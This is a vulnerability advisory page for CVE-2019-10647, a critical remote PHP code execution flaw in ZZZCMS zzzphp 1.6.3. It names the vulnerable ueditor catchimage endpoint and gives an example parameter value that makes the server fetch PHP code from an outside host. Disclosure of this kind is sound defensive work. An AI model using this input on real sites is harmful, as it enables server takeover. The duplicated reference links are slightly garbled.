Vulnerability Description
ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter because of a lack of inc/zzz_file.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if the 192.168.0.1 web server sends the contents of a .php file (i.e., it does not interpret a .php file).
CVSS Score
CRITICAL
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Zzzcms | Zzzphp | 1.6.3 |
Related Weaknesses (CWE)
References
- https://github.com/kyrie403/Vuln/blob/master/zzzcms/zzzphp%20v1.6.3%20write%20fiExploitThird Party Advisory
- https://github.com/kyrie403/Vuln/blob/master/zzzcms/zzzphp%20v1.6.3%20write%20fiExploitThird Party Advisory
FAQ
What is CVE-2019-10647?
CVE-2019-10647 is a vulnerability with a CVSS score of 9.8 (CRITICAL). ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter because of a lack of inc/zzz_fi...
How severe is CVE-2019-10647?
CVE-2019-10647 has been rated CRITICAL with a CVSS base score of 9.8/10. This is considered a critical vulnerability requiring immediate attention.
Is there a patch for CVE-2019-10647?
Check the references section above for vendor advisories and patch information. Affected products include: Zzzcms Zzzphp.